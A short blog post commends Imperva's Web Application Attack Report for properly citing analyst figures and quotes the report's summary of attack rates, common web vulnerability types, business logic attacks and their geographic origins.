Imperva does it right
I've always been irritated by those vague citiations to analyst reports that you see in sales and marketing presentations. Things like "This market is projected to grow by 1,000,000 percent by 2015 (Forrester)."
I always assume that this really means "This market is projected to grow by 1,000,000 percent by 2015 (but we know you really won't check this outlandish claim)." That's why I so pleased to see how the most recent version of "Imperva's Web Application Attack Report" (PDF) actually included references to analyst estimates that they cited.
There are lots of other reasons to read this report aside from the fact that Imperva did a good job with their references. There's lots of interesting data about how the hacker threat is continuing to evolve. Here's how they summarize what's contined in this report:
- Hackers continue to increase the scale of their attacks: In our last report, we explained that websites are probed about once every two minutes, or 27 times per hour. Over the past six months, the number of probes has dropped to 18. Though a drop, this change does not mean hackers are any less persistent. In fact, when applications are attacked, hacker firepower actually saw a 30% increase. In July, we reported that applications experience about 25,000 attacks per hour. In the last six months, this has increased to nearly 38,000 attacks – or ten per second.
- Hackers exploit five common application vulnerabilities: We have identified and investigated malicious traffic containing the following technical attacks: Remote File Inclusion (RFI), SQL Injection (SQLi), Local File Inclusion (LFI), Cross Site Scripting (XSS) and Directory Traversal (DT). Cross Site Scripting and Directory Traversal are the most prevalent classical attack types.
- Hackers are relying on business logic attacks due to their ability to evade detection: We also investigated two types of Business Logic attacks: Email Extraction and Comment Spamming (EmExt and ComSpm, respectively, in following Figures and Tables). Comment Spamming injects malicious links into comment fields to defraud consumers and alter search engine results. Email Extraction simply catalogs email addresses for building spam lists. These Business Logic attacks accounted for 14% of the analyzed malicious traffic. Email Extraction traffic was more prevalent than Comment Spamming. A full anatomy of BLAs is described in this report.
- The geographic origin of Business Logic attacks were:
- Email extraction was dominated by hosts based in African countries.
- An unusual portion of the Comment-spamming activity was observed from eastern-European countries.